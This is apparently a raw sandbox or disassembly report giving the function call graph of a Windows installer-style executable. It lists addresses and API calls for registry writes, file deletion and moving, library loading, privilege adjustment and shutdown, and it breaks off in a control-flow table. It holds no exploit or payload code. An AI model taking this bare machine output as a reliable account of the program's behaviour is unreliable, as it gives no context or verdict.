4042a9 3662->3668 3678 403f36 EnableWindow 3665->3678 3666->3658 3667->3668 3668->3664 3671 4042af SendMessageA 3668->3671 3669 4041e9 3672 4042e7 SendMessageA 3669->3672 3671->3664 3672->3651 3673 4040f4 GetDlgItem 3679 403f49 SendMessageA 3673->3679 3675 40410a SendMessageA 3676 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3675->3676 3677 404128 GetSysColor 3675->3677 3676->3664 3677->3676 3678->3673 3679->3675 3680->3669 3681 40205e 3682 402a3a 18 API calls 3681->3682 3683 402065 3682->3683 3684 402a3a 18 API calls 3683->3684 3685 40206f 3684->3685 3686 402a3a 18 API calls 3685->3686 3687 402079 3686->3687 3688 402a3a 18 API calls 3687->3688 3689 402083 3688->3689 3690 402a3a 18 API calls 3689->3690 3691 40208d 3690->3691 3692 4020cc CoCreateInstance 3691->3692 3693 402a3a 18 API calls 3691->3693 3696 4020eb 3692->3696 3698 402193 3692->3698 3693->3692 3694 401423 25 API calls 3695 4021c9 3694->3695 3697 402173 MultiByteToWideChar 3696->3697 3696->3698 3697->3698 3698->3694 3698->3695 3699 401cde GetDlgItem GetClientRect 3700 402a3a 18 API calls 3699->3700 3701 401d0e LoadImageA SendMessageA 3700->3701 3702 401d2c DeleteObject 3701->3702 3703 4028cf 3701->3703 3702->3703 3704 401662 3705 402a3a 18 API calls 3704->3705 3706 401669 3705->3706 3707 402a3a 18 API calls 3706->3707 3708 401672 3707->3708 3709 402a3a 18 API calls 3708->3709 3710 40167b MoveFileA 3709->3710 3711 401687 3710->3711 3712 40168e 3710->3712 3713 401423 25 API calls 3711->3713 3714 406033 2 API calls 3712->3714 3716 4021c9 3712->3716 3713->3716 3715 40169d 3714->3715 3715->3716 3717 405bea 38 API calls 3715->3717 3717->3711 2802 402364 2803 40236a 2802->2803 2804 402a3a 18 API calls 2803->2804 2805 40237c 2804->2805 2806 402a3a 18 API calls 2805->2806 2807 402386 RegCreateKeyExA 2806->2807 2808 4023b0 2807->2808 2809 4028cf 2807->2809 2810 4023c8 2808->2810 2811 402a3a 18 API calls 2808->2811 2812 4023d4 2810->2812 2819 402a1d 2810->2819 2815 4023c1 lstrlenA 2811->2815 2814 4023ef RegSetValueExA 2812->2814 2822 402e9f 2812->2822 2817 402405 RegCloseKey 2814->2817 2815->2810 2817->2809 2820 405d51 18 API calls 2819->2820 2821 402a31 2820->2821 2821->2812 2824 402eb5 2822->2824 2823 402ee3 2842 4030b1 2823->2842 2824->2823 2847 4030c7 SetFilePointer 2824->2847 2828 402f00 GetTickCount 2831 403034 2828->2831 2838 402f4f 2828->2838 2829 40304a 2830 40308c 2829->2830 2835 40304e 2829->2835 2832 4030b1 ReadFile 2830->2832 2831->2814 2832->2831 2833 4030b1 ReadFile 2833->2838 2834 4030b1 ReadFile 2834->2835 2835->2831 2835->2834 2836 405a49 WriteFile 2835->2836 2836->2835 2837 402fa5 GetTickCount 2837->2838 2838->2831 2838->2833 2838->2837 2839 402fca MulDiv wsprintfA 2838->2839 2845 405a49 WriteFile 2838->2845 2840 404f48 25 API calls 2839->2840 2840->2838 2848 405a1a ReadFile 2842->2848 2846 405a67 2845->2846 2846->2838 2847->2823 2849 402eee 2848->2849 2849->2828 2849->2829 2849->2831 3718 401dea 3719 402a3a 18 API calls 3718->3719 3720 401df0 3719->3720 3721 402a3a 18 API calls 3720->3721 3722 401df9 3721->3722 3723 402a3a 18 API calls 3722->3723 3724 401e02 3723->3724 3725 402a3a 18 API calls 3724->3725 3726 401e0b 3725->3726 3727 401423 25 API calls 3726->3727 3728 401e12 ShellExecuteA 3727->3728 3729 401e3f 3728->3729 3730 40366d 3731 403678 3730->3731 3732 40367f GlobalAlloc 3731->3732 3733 40367c 3731->3733 3732->3733 3734 401eee 3735 402a3a 18 API calls 3734->3735 3736 401ef5 3735->3736 3737 4060c8 5 API calls 3736->3737 3738 401f04 3737->3738 3739 401f1c GlobalAlloc 3738->3739 3748 401f84 3738->3748 3740 401f30 3739->3740 3739->3748 3741 4060c8 5 API calls 3740->3741 3742 401f37 3741->3742 3743 4060c8 5 API calls 3742->3743 3744 401f41 3743->3744 3744->3748 3749 405c8d wsprintfA 3744->3749 3746 401f78 3750 405c8d wsprintfA 3746->3750 3749->3746 3750->3748 3751 4014f0 SetForegroundWindow 3752 4028cf 3751->3752 3758 4018f5 3759 40192c 3758->3759 3760 402a3a 18 API calls 3759->3760 3761 401931 3760->3761 3762 4055d1 69 API calls 3761->3762 3763 40193a 3762->3763 3764 4024f7 3765 402a3a 18 API calls 3764->3765 3766 4024fe 3765->3766 3769 4059a2 GetFileAttributesA CreateFileA 3766->3769 3768 40250a 3769->3768 3770 4018f8 3771 402a3a 18 API calls 3770->3771 3772 4018ff 3771->3772 3773 405525 MessageBoxIndirectA 3772->3773 3774 401908 3773->3774 3775 4014fe 3776 401506 3775->3776 3778 401519 3775->3778 3777 402a1d 18 API calls 3776->3777 3777->3778 3779 402b7f 3780 402ba7 3779->3780 3781 402b8e SetTimer 3779->3781 3782 402bfc 3780->3782 3783 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3780->3783 3781->3780 3783->3782 3784 401000 3785 401037 BeginPaint GetClientRect 3784->3785 3786 40100c DefWindowProcA 3784->3786 3787 4010f3 3785->3787 3789 401179 3786->3789 3790 401073 CreateBrushIndirect FillRect DeleteObject 3787->3790 3791 4010fc 3787->3791 3790->3787 3792 401102 CreateFontIndirectA 3791->3792 3793 401167 EndPaint 3791->3793 3792->3793 3794 401112 6 API calls 3792->3794 3793->3789 3794->3793 3795 401b02 3796 402a3a 18 API calls 3795->3796 3797 401b09 3796->3797 3798 402a1d 18 API calls 3797->3798 3799 401b12 wsprintfA 3798->3799 3800 4028cf 3799->3800 3801 402482 3802 402b44 19 API calls 3801->3802 3803 40248c 3802->3803 3804 402a1d 18 API calls 3803->3804 3805 402495 3804->3805 3806 4024b8 RegEnumValueA 3805->3806 3807 4024ac RegEnumKeyA 3805->3807 3808 4026a6 3805->3808 3806->3808 3809 4024d1 RegCloseKey 3806->3809 3807->3809 3809->3808 2755 401a03 2761 402a3a 2755->2761 2758 401a20 2759 401a25 lstrcmpA 2758->2759 2760 401a33 2758->2760 2759->2760 2762 402a46 2761->2762 2763 405d51 18 API calls 2762->2763 2764 402a67 2763->2764 2765 401a0c ExpandEnvironmentStringsA 2764->2765 2766 405f9a 5 API calls 2764->2766 2765->2758 2765->2760 2766->2765 3811 402283 3812 40228b 3811->3812 3815 402291 3811->3815 3813 402a3a 18 API calls 3812->3813 3813->3815 3814 402a3a 18 API calls 3816 4022a1 3814->3816 3815->3814 3815->3816 3817 402a3a 18 API calls 3816->3817 3819 4022af 3816->3819 3817->3819 3818 402a3a 18 API calls 3820 4022b8 WritePrivateProfileStringA 3818->3820 3819->3818 3821 405086 3822 405231 3821->3822 3823 4050a8 GetDlgItem GetDlgItem GetDlgItem 3821->3823 3825 405261 3822->3825 3826 405239 GetDlgItem CreateThread CloseHandle 3822->3826 3866 403f49 SendMessageA 3823->3866 3827 4052b0 3825->3827 3828 405277 ShowWindow ShowWindow 3825->3828 3829 40528f 3825->3829 3826->3825 3835 403f7b 8 API calls 3827->3835 3868 403f49 SendMessageA 3828->3868 3830 4052ea 3829->3830 3833 4052c3 ShowWindow 3829->3833 3834 40529f 3829->3834 3830->3827 3839 4052f7 SendMessageA 3830->3839 3831 405118 3836 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3831->3836 3842 4052e3 3833->3842 3843 4052d5 3833->3843 3840 403eed SendMessageA 3834->3840 3841 4052bc 3835->3841 3837 405171 SendMessageA SendMessageA 3836->3837 3838 40518d 3836->3838 3837->3838 3844 4051a0 3838->3844 3845 405192 SendMessageA 3838->3845 3839->3841 3846 405310 CreatePopupMenu 3839->3846 3840->3827 3848 403eed SendMessageA 3842->3848 3847 404f48 25 API calls 3843->3847 3850 403f14 19 API calls 3844->3850 3845->3844 3849 405d51 18 API calls 3846->3849 3847->3842 3848->3830 3851 405320 AppendMenuA 3849->3851 3852 4051b0 3850->3852 3853 405351 TrackPopupMenu 3851->3853 3854 40533e GetWindowRect 3851->3854 3855 4051b9 ShowWindow 3852->3855 3856 4051ed GetDlgItem SendMessageA 3852->3856 3853->3841 3857 40536d 3853->3857 3854->3853 3858 4051dc 3855->3858 3859 4051cf ShowWindow 3855->3859 3856->3841 3860 405214 SendMessageA SendMessageA 3856->3860 3861 40538c SendMessageA 3857->3861 3867 403f49 SendMessageA 3858->3867 3859->3858 3860->3841 3861->3861 3862 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3861->3862 3864 4053cb SendMessageA 3862->3864 3864->3864 3865 4053ed GlobalUnlock SetClipboardData CloseClipboard 3864->3865 3865->3841 3866->3831 3867->3856 3868->3829 2934 402308 2935 402338 2934->2935 2936 40230d 2934->2936 2938 402a3a 18 API calls 2935->2938 2947 402b44 2936->2947 2939 40233f 2938->2939 2951 402a7a RegOpenKeyExA 2939->2951 2940 402314 2941 40231e 2940->2941 2946 402357 2940->2946 2942 402a3a 18 API calls 2941->2942 2944 402325 RegDeleteValueA RegCloseKey 2942->2944 2944->2946 2948 402a3a 18 API calls 2947->2948 2949 402b5d 2948->2949 2950 402b6b RegOpenKeyExA 2949->2950 2950->2940 2953 402aa5 2951->2953 2959 402355 2951->2959 2952 402acb RegEnumKeyA 2952->2953 2954 402add RegCloseKey 2952->2954 2953->2952 2953->2954 2955 402b02 RegCloseKey 2953->2955 2957 402a7a 5 API calls 2953->2957 2961 4060c8 GetModuleHandleA 2954->2961 2955->2959 2957->2953 2959->2946 2960 402b1d RegDeleteKeyA 2960->2959 2962 4060e4 2961->2962 2963 4060ee GetProcAddress 2961->2963 2967 40605a GetSystemDirectoryA 2962->2967 2965 402aed 2963->2965 2965->2959 2965->2960 2966 4060ea 2966->2963 2966->2965 2968 40607c wsprintfA LoadLibraryExA 2967->2968 2968->2966 3869 401c8a 3870 402a1d 18 API calls 3869->3870 3871 401c90 IsWindow 3870->3871 3872 4019f3 3871->3872 3873 40430b 3874 404341 3873->3874 3875 40431b 3873->3875 3876 403f7b 8 API calls 3874->3876 3877 403f14 19 API calls 3875->3877 3878 40434d 3876->3878 3879 404328 SetDlgItemTextA 3877->3879 3879->3874 3120 40310f SetErrorMode GetVersion 3121 403146 3120->3121 3122 40314c 3120->3122 3123 4060c8 5 API calls 3121->3123 3124 40605a 3 API calls 3122->3124 3123->3122 3125 403162 lstrlenA 3124->3125 3125->3122 3126 403171 3125->3126 3127 4060c8 5 API calls 3126->3127 3128 403179 3127->3128 3129 4060c8 5 API calls 3128->3129 3130 403180 #17 OleInitialize SHGetFileInfoA 3129->3130 3208 405d2f lstrcpynA 3130->3208 3132 4031bd GetCommandLineA 3209 405d2f lstrcpynA 3132->3209 3134 4031cf GetModuleHandleA 3135 4031e6 3134->3135 3136 4057cc CharNextA 3135->3136 3137 4031fa CharNextA 3136->3137 3146 40320a 3137->3146 3138 4032d4 3139 4032e7 GetTempPathA 3138->3139 3210 4030de 3139->3210 3141 4032ff 3142 403303 GetWindowsDirectoryA lstrcatA 3141->3142 3143 403359 DeleteFileA 3141->3143 3145 4030de 12 API calls 3142->3145 3220 402c66 GetTickCount GetModuleFileNameA 3143->3220 3144 4057cc CharNextA 3144->3146 3148 40331f 3145->3148 3146->3138 3146->3144 3149 4032d6 3146->3149 3148->3143 3151 403323 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3148->3151 3304 405d2f lstrcpynA 3149->3304 3150 40336d 3157 4057cc CharNextA 3150->3157 3190 4033f3 3150->3190 3203 403403 3150->3203 3153 4030de 12 API calls 3151->3153 3155 403351 3153->3155 3155->3143 3155->3203 3159 403388 3157->3159 3167 403433 3159->3167 3168 4033ce 3159->3168 3160 40353b 3163 403543 GetCurrentProcess OpenProcessToken 3160->3163 3164 4035bd ExitProcess 3160->3164 3161 40341d 3314 405525 3161->3314 3169 40358e 3163->3169 3170 40355e LookupPrivilegeValueA AdjustTokenPrivileges 3163->3170 3318 4054a8 3167->3318 3171 40588f 18 API calls 3168->3171 3173 4060c8 5 API calls 3169->3173 3170->3169 3174 4033d9 3171->3174 3176 403595 3173->3176 3174->3203 3305 405d2f lstrcpynA 3174->3305 3179 4035aa ExitWindowsEx 3176->3179 3182 4035b6 3176->3182 3177 403454 lstrcatA lstrcmpiA 3181 403470 3177->3181 3177->3203 3178 403449 lstrcatA 3178->3177 3179->3164 3179->3182 3184 403475 3181->3184 3185 40347c 3181->3185 3186 40140b 2 API calls 3182->3186 3183 4033e8 3306 405d2f lstrcpynA 3183->3306 3321 40540e CreateDirectoryA 3184->3321 3326 40548b CreateDirectoryA 3185->3326 3186->3164 3248 4036af 3190->3248 3192 403481 SetCurrentDirectoryA 3193 403490 3192->3193 3194 40349b 3192->3194 3329 405d2f lstrcpynA 3193->3329 3330 405d2f lstrcpynA 3194->3330 3197 405d51 18 API calls 3198 4034da DeleteFileA 3197->3198 3199 4034e7 CopyFileA 3198->3199 3205 4034a9 3198->3205 3199->3205 3200 40352f 3201 405bea 38 API calls 3200->3201 3201->3203 3202 405bea 38 API calls 3202->3205 3307 4035d5 3203->3307 3204 405d51 18 API calls 3204->3205 3205->3197 3205->3200 3205->3202 3205->3204 3206 4054c0 2 API calls 3205->3206 3207 40351b CloseHandle 3205->3207 3206->3205 3207->3205 3208->3132 3209->3134 3211 405f9a 5 API calls 3210->3211 3213 4030ea 3211->3213 3212 4030f4 3212->3141 3213->3212 3214 4057a1 3 API calls 3213->3214 3215 4030fc 3214->3215 3216 40548b 2 API calls 3215->3216 3217 403102 3216->3217 3331 4059d1 3217->3331 3335 4059a2 GetFileAttributesA CreateFileA 3220->3335 3222 402ca6 3247 402cb6 3222->3247 3336 405d2f lstrcpynA 3222->3336 3224 402ccc 3225 4057e8 2 API calls 3224->3225 3226 402cd2 3225->3226 3337 405d2f lstrcpynA 3226->3337 3228 402cdd GetFileSize 3229 402dd9 3228->3229 3241 402cf4 3228->3241 3338 402c02 3229->3338 3231 402de2 3233 402e12 GlobalAlloc 3231->3233 3231->3247 3350 4030c7 SetFilePointer 3231->3350 3232 4030b1 ReadFile 3232->3241 3349 4030c7 SetFilePointer 3233->3349 3235 402e45 3237 402c02 6 API calls 3235->3237 3237->3247 3238 402dfb 3240 4030b1 ReadFile 3238->3240 3239 402e2d 3242 402e9f 32 API calls 3239->3242 3243 402e06 3240->3243 3241->3229 3241->3232 3241->3235 3244 402c02 6 API calls 3241->3244 3241->3247 3245 402e39 3242->3245 3243->3233 3243->3247 3244->3241 3245->3245 3246 402e76 SetFilePointer 3245->3246 3245->3247 3246->3247 3247->3150 3249 4060c8 5 API calls 3248->3249 3250 4036c3 3249->3250 3251 4036c9 3250->3251 3252 4036db 3250->3252 3360 405c8d wsprintfA 3251->3360 3253 405c16 3 API calls 3252->3253 3256 403706 3253->3256 3255 403724 lstrcatA 3257 4036d9 3255->3257 3256->3255 3258 405c16 3 API calls 3256->3258 3351 403974 3257->3351 3258->3255 3261 40588f 18 API calls 3262 403756 3261->3262 3263 4037df 3262->3263 3265 405c16 3 API calls 3262->3265 3264 40588f 18 API calls 3263->3264 3266 4037e5 3264->3266 3267 403782 3265->3267 3268 4037f5 LoadImageA 3266->3268 3269 405d51 18 API calls 3266->3269 3267->3263 3273 40379e lstrlenA 3267->3273 3276 4057cc CharNextA 3267->3276 3270 40389b 3268->3270 3271 40381c RegisterClassA 3268->3271 3269->3268 3272 40140b 2 API calls 3270->3272 3274 403852 SystemParametersInfoA CreateWindowExA 3271->3274 3303 4038a5 3271->3303 3275 4038a1 3272->3275 3277 4037d2 3273->3277 3278 4037ac lstrcmpiA 3273->3278 3274->3270 3283 403974 19 API calls 3275->3283 3275->3303 3280 40379c 3276->3280 3279 4057a1 3 API calls 3277->3279 3278->3277 3281 4037bc GetFileAttributesA 3278->3281 3284 4037d8 3279->3284 3280->3273 3282 4037c8 3281->3282 3282->3277 3285 4057e8 2 API calls 3282->3285 3286 4038b2 3283->3286 3361 405d2f lstrcpynA 3284->3361 3285->3277 3288 403941 3286->3288 3289 4038be ShowWindow 3286->3289 3362 40501a OleInitialize 3288->3362 3291 40605a 3 API calls 3289->3291 3293 4038d6 3291->3293 3292 403947 3294 403963 3292->3294 3295 40394b 3292->3295 3296 4038e4 GetClassInfoA 3293->3296 3298 40605a 3 API calls 3293->3298 3297 40140b 2 API calls 3294->3297 3301 40140b 2 API calls 3295->3301 3295->3303 3299 4038f8 GetClassInfoA RegisterClassA 3296->3299 3300 40390e DialogBoxParamA 3296->3300 3297->3303 3298->3296 3299->3300 3302 40140b 2 API calls 3300->3302 3301->3303 3302->3303 3303->3203 3304->3139 3305->3183 3306->3190 3308 4035ed 3307->3308 3309 4035df CloseHandle 3307->3309 3370 40361a 3308->3370 3309->3308 3312 4055d1 69 API calls 3313 40340c OleUninitialize 3312->3313 3313->3160 3313->3161 3315 40553a 3314->3315 3316 40342b ExitProcess 3315->3316 3317 40554e MessageBoxIndirectA 3315->3317 3317->3316 3319 4060c8 5 API calls 3318->3319 3320 403438 lstrcatA 3319->3320 3320->3177 3320->3178 3322 40347a 3321->3322 3323 40545f GetLastError 3321->3323 3322->3192 3323->3322 3324 40546e SetFileSecurityA 3323->3324 3324->3322 3325 405484 GetLastError 3324->3325 3325->3322 3327 40549b 3326->3327 3328 40549f GetLastError 3326->3328 3327->3192 3328->3327 3329->3194 3330->3205 3332 4059dc GetTickCount GetTempFileNameA 3331->3332 3333 40310d 3332->3333 3334 405a09 3332->3334 3333->3141 3334->3332 3334->3333 3335->3222 3336->3224 3337->3228 3339 402c23 3338->3339 3340 402c0b 3338->3340 3343 402c33 GetTickCount 3339->3343 3344 402c2b 3339->3344 3341 402c14 DestroyWindow 3340->3341 3342 402c1b 3340->3342 3341->3342 3342->3231 3345 402c41 CreateDialogParamA ShowWindow 3343->3345 3346 402c64 3343->3346 3347 406104 2 API calls 3344->3347 3345->3346 3346->3231 3348 402c31 3347->3348 3348->3231 3349->3239 3350->3238 3352 403988 3351->3352 3369 405c8d wsprintfA 3352->3369 3354 4039f9 3355 405d51 18 API calls 3354->3355 3356 403a05 SetWindowTextA 3355->3356 3357 403a21 3356->3357 3358 403734 3356->3358 3357->3358 3359 405d51 18 API calls 3357->3359 3358->3261 3359->3357 3360->3257 3361->3263 3363 403f60 SendMessageA 3362->3363 3366 40503d 3363->3366 3364 405064 3365 403f60 SendMessageA 3364->3365 3367 405076 OleUninitialize 3365->3367 3366->3364 3368 401389 2 API calls 3366->3368 3367->3292 3368->3366 3369->3354 3371 403628 3370->3371 3372 4035f2 3371->3372 3373 40362d FreeLibrary GlobalFree 3371->3373 3372->3312 3373->3372 3373->3373 3374 402410 3375 402b44 19 API calls 3374->3375 3376 40241a 3375->3376 3377 402a3a 18 API calls 3376->3377 3378 402423 3377->3378 3379 40242d RegQueryValueExA 3378->3379 3382 4026a6 3378->3382 3380 402453 RegCloseKey 3379->3380 3381 40244d 3379->3381 3380->3382 3381->3380 3385 405c8d wsprintfA 3381->3385 3385->3380 3386 401f90 3387 401fa2 3386->3387 3388 402050 3386->3388 3389 402a3a 18 API calls 3387->3389 3390 401423 25 API calls 3388->3390 3391 401fa9 3389->3391 3397 4021c9 3390->3397 3392 402a3a 18 API calls 3391->3392 3393 401fb2 3392->3393 3394 401fc7 LoadLibraryExA 3393->3394 3395 401fba GetModuleHandleA 3393->3395 3394->3388 3396 401fd7 GetProcAddress 3394->3396 3395->3394 3395->3396 3398 402023 3396->3398 3399 401fe6 3396->3399 3400 404f48 25 API calls 3398->3400 3402 401ff6 3399->3402 3404 401423 3399->3404 3400->3402 3402->3397 3403 402044 FreeLibrary 3402->3403 3403->3397 3405 404f48 25 API calls 3404->3405 3406 401431 3405->3406 3406->3402 3880 401490 3881 404f48 25 API calls 3880->3881 3882 401497 3881->3882 3468 401595 3469 402a3a 18 API calls 3468->3469 3470 40159c SetFileAttributesA 3469->3470 3471 4015ae 3470->3471 3883 402616 3884 40261d 3883->3884 3886 40287c 3883->3886 3885 402a1d 18 API calls 3884->3885 3887 402628 3885->3887 3888 40262f SetFilePointer 3887->3888 3888->3886 3889 40263f 3888->3889 3891 405c8d wsprintfA 3889->3891 3891->3886 3892 401717 3893 402a3a 18 API calls 3892->3893 3894 40171e SearchPathA 3893->3894 3895 401739 3894->3895 3896 402519 3897 40252e 3896->3897 3898 40251e 3896->3898 3900 402a3a 18 API calls 3897->3900 3899 402a1d 18 API calls 3898->3899 3902 402527 3899->3902 3901 402535 lstrlenA 3900->3901 3901->3902 3903 405a49 WriteFile 3902->3903 3904 402557 3902->3904 3903->3904 3905 40149d 3906 4014ab PostQuitMessage 3905->3906 3907 40226e 3905->3907 3906->3907 3908 4046a3 3909 4046b3 3908->3909 3910 4046cf 3908->3910 3919 405509 GetDlgItemTextA 3909->3919 3912 404702 3910->3912 3913 4046d5 SHGetPathFromIDListA 3910->3913 3915 4046e5 3913->3915 3918 4046ec SendMessageA 3913->3918 3914 4046c0 SendMessageA 3914->3910 3916 40140b 2 API calls 3915->3916 3916->3918 3918->3912 3919->3914 3920 401ca7 3921 402a1d 18 API calls 3920->3921 3922 401cae 3921->3922 3923 402a1d 18 API calls 3922->3923 3924 401cb6 GetDlgItem 3923->3924 3925 402513 3924->3925 3926 404028 lstrcpynA lstrlenA 2992 40192a 2993 40192c 2992->2993 2994 402a3a 18 API calls 2993->2994 2995 401931 2994->2995 2998 4055d1 2995->2998 3038 40588f 2998->3038 3001 405610 3004 405748 3001->3004 3052 405d2f lstrcpynA 3001->3052 3002 4055f9 DeleteFileA 3003 40193a 3002->3003 3004->3003 3070 406033 FindFirstFileA 3004->3070 3006 405636 3007 405649 3006->3007 3008 40563c lstrcatA 3006->3008 3053 4057e8 lstrlenA 3007->3053 3011 40564f 3008->3011 3012 40565d lstrcatA 3011->3012 3014 405668 lstrlenA FindFirstFileA 3011->3014 3012->3014 3016 40573e 3014->3016 3036 40568c 3014->3036 3015 405766 3073 4057a1 lstrlenA CharPrevA 3015->3073 3016->3004 3018 4057cc CharNextA 3018->3036 3020 405589 5 API calls 3021 405778 3020->3021 3022 405792 3021->3022 3023 40577c 3021->3023 3025 404f48 25 API calls 3022->3025 3023->3003 3027 404f48 25 API calls 3023->3027 3025->3003 3026 40571d FindNextFileA 3028 405735 FindClose 3026->3028 3026->3036 3029 405789 3027->3029 3028->3016 3030 405bea 38 API calls 3029->3030 3033 405790 3030->3033 3032 4055d1 62 API calls 3032->3036 3033->3003 3034 404f48 25 API calls 3034->3026 3035 404f48 25 API calls 3035->3036 3036->3018 3036->3026 3036->3032 3036->3034 3036->3035 3057 405d2f lstrcpynA 3036->3057 3058 405589 3036->3058 3066 405bea MoveFileExA 3036->3066 3076 405d2f lstrcpynA 3038->3076 3040 4058a0 3077 40583a CharNextA CharNextA 3040->3077 3043 4055f1 3043->3001 3043->3002 3044 405f9a 5 API calls 3050 4058b6 3044->3050 3045 4058e1 lstrlenA 3046 4058ec 3045->3046 3045->3050 3048 4057a1 3 API calls 3046->3048 3047 406033 2 API calls 3047->3050 3049 4058f1 GetFileAttributesA 3048->3049 3049->3043 3050->3043 3050->3045 3050->3047 3051 4057e8 2 API calls 3050->3051 3051->3045 3052->3006 3054 4057f5 3053->3054 3055 405806 3054->3055 3056 4057fa CharPrevA 3054->3056 3055->3011 3056->3054 3056->3055 3057->3036 3083 40597d GetFileAttributesA 3058->3083 3061 4055a4 RemoveDirectoryA 3064 4055b2 3061->3064 3062 4055ac DeleteFileA 3062->3064 3063 4055b6 3063->3036 3064->3063 3065 4055c2 SetFileAttributesA 3064->3065 3065->3063 3067 405c0b 3066->3067 3068 405bfe 3066->3068 3067->3036 3086 405a78 lstrcpyA 3068->3086 3071 405762 3070->3071 3072 406049 FindClose 3070->3072 3071->3003 3071->3015 3072->3071 3074 40576c 3073->3074 3075 4057bb lstrcatA 3073->3075 3074->3020 3075->3074 3076->3040 3078 405855 3077->3078 3080 405865 3077->3080 3079 405860 CharNextA 3078->3079 3078->3080 3082 405885 3079->3082 3081 4057cc CharNextA 3080->3081 3080->3082 3081->3080 3082->3043 3082->3044 3084 405595 3083->3084 3085 40598f SetFileAttributesA 3083->3085 3084->3061 3084->3062 3084->3063 3085->3084 3087 405aa0 3086->3087 3088 405ac6 GetShortPathNameA 3086->3088 3113 4059a2 GetFileAttributesA CreateFileA 3087->3113 3090 405be5 3088->3090 3091 405adb 3088->3091 3090->3067 3091->3090 3093 405ae3 wsprintfA 3091->3093 3092 405aaa CloseHandle GetShortPathNameA 3092->3090 3094 405abe 3092->3094 3095 405d51 18 API calls 3093->3095 3094->3088 3094->3090 3096 405b0b 3095->3096 3114 4059a2 GetFileAttributesA CreateFileA 3096->3114 3098 405b18 3098->3090 3099 405b27 GetFileSize GlobalAlloc 3098->3099 3100 405b49 3099->3100 3101 405bde CloseHandle 3099->3101 3102 405a1a ReadFile 3100->3102 3101->3090 3103 405b51 3102->3103 3103->3101 3115 405907 lstrlenA 3103->3115 3106 405b68 lstrcpyA 3109 405b8a 3106->3109 3107 405b7c 3108 405907 4 API calls 3107->3108 3108->3109 3110 405bc1 SetFilePointer 3109->3110 3111 405a49 WriteFile 3110->3111 3112 405bd7 GlobalFree 3111->3112 3112->3101 3113->3092 3114->3098 3116 405948 lstrlenA 3115->3116 3117 405950 3116->3117 3118 405921 lstrcmpiA 3116->3118 3117->3106 3117->3107 3118->3117 3119 40593f CharNextA 3118->3119 3119->3116 3448 4015b3 3449 402a3a 18 API calls 3448->3449 3450 4015ba 3449->3450 3451 40583a 4 API calls 3450->3451 3466 4015c2 3451->3466 3452 40161c 3454 401621 3452->3454 3455 40164a 3452->3455 3453 4057cc CharNextA 3453->3466 3456 401423 25 API calls 3454->3456 3458 401423 25 API calls 3455->3458 3457 401628 3456->3457 3467 405d2f lstrcpynA 3457->3467 3463 401642 3458->3463 3459 40548b 2 API calls 3459->3466 3461 4054a8 5 API calls 3461->3466 3462 401633 SetCurrentDirectoryA 3462->3463 3464 401604 GetFileAttributesA 3464->3466 3465 40540e 4 API calls 3465->3466 3466->3452 3466->3453 3466->3459 3466->3461 3466->3464 3466->3465 3467->3462 3927 4016b3 3928 402a3a 18 API calls 3927->3928 3929 4016b9 GetFullPathNameA 3928->3929 3930 4016d0 3929->3930 3936 4016f1 3929->3936 3933 406033 2 API calls 3930->3933 3930->3936 3931 401705 GetShortPathNameA 3932 4028cf 3931->3932 3934 4016e1 3933->3934 3934->3936 3937 405d2f lstrcpynA 3934->3937 3936->3931 3936->3932 3937->3936 3938 4014b7 3939 4014bd 3938->3939 3940 401389 2 API calls 3939->3940 3941 4014c5 3940->3941 3942 401d38 GetDC GetDeviceCaps 3943 402a1d 18 API calls 3942->3943 3944 401d56 MulDiv ReleaseDC 3943->3944 3945 402a1d 18 API calls 3944->3945 3946 401d75 3945->3946 3947 405d51 18 API calls 3946->3947 3948 401dae CreateFontIndirectA 3947->3948 3949 402513 3948->3949 3472 404ebc 3473 404ee0 3472->3473 3474 404ecc 3472->3474 3476 404ee8 IsWindowVisible 3473->3476 3480 404f08 3473->3480 3475 404ed2 3474->3475 3485 404f29 3474->3485 3478 403f60 SendMessageA 3475->3478 3479 404ef5 3476->3479 3476->3485 3477 404f2e CallWindowProcA 3481 404edc 3477->3481 3478->3481 3482 404813 5 API calls 3479->3482 3480->3477 3484 404893 4 API calls 3480->3484 3483 404eff 3482->3483 3483->3480 3484->3485 3485->3477 3486 40173e 3487 402a3a 18 API calls 3486->3487 3488 401745 3487->3488 3489 4059d1 2 API calls 3488->3489 3490 40174c 3489->3490 3491 4059d1 2 API calls 3490->3491 3491->3490 3950 401ebe 3951 402a3a 18 API calls 3950->3951 3952 401ec5 3951->3952 3953 406033 2 API calls 3952->3953 3954 401ecb 3953->3954 3956 401edd 3954->3956 3957 405c8d wsprintfA 3954->3957 3957->3956 3958 40193f 3959 402a3a 18 API calls 3958->3959 3960 401946 lstrlenA 3959->3960 3961 402513 3960->3961

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 40310f-403144 SetErrorMode GetVersion 1 403146-40314e call 4060c8 0->1 2 403157 0->2 1->2 7 403150 1->7 4 40315c-40316f call 40605a lstrlenA 2->4 9 403171-4031e4 call 4060c8 * 2 #17 OleInitialize SHGetFileInfoA call 405d2f GetCommandLineA call 405d2f GetModuleHandleA 4->9 7->2 18 4031f0-403205 call 4057cc CharNextA 9->18 19 4031e6-4031eb 9->19 22 4032ca-4032ce 18->22 19->18 23 4032d4 22->23 24 40320a-40320d 22->24 27 4032e7-403301 GetTempPathA call 4030de 23->27 25 403215-40321d 24->25 26 40320f-403213 24->26 28 403225-403228 25->28 29 40321f-403220 25->29 26->25 26->26 34 403303-403321 GetWindowsDirectoryA lstrcatA call 4030de 27->34 35 403359-403373 DeleteFileA call 402c66 27->35 31 4032ba-4032c7 call 4057cc 28->31 32 40322e-403232 28->32 29->28 31->22 51 4032c9 31->51 37 403234-40323a 32->37 38 40324a-403277 32->38 34->35 52 403323-403353 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4030de 34->52 53 403407-403417 call 4035d5 OleUninitialize 35->53 54 403379-40337f 35->54 44 403240 37->44 45 40323c-40323e 37->45 40 403279-40327f 38->40 41 40328a-4032b8 38->41 47 403281-403283 40->47 48 403285 40->48 41->31 49 4032d6-4032e2 call 405d2f 41->49 44->38 45->38 45->44 47->41 47->48 48->41 49->27 51->22 52->35 52->53 66 40353b-403541 53->66 67 40341d-40342d call 405525 ExitProcess 53->67 57 403381-40338c call 4057cc 54->57 58 4033f7-4033fe call 4036af 54->58 71 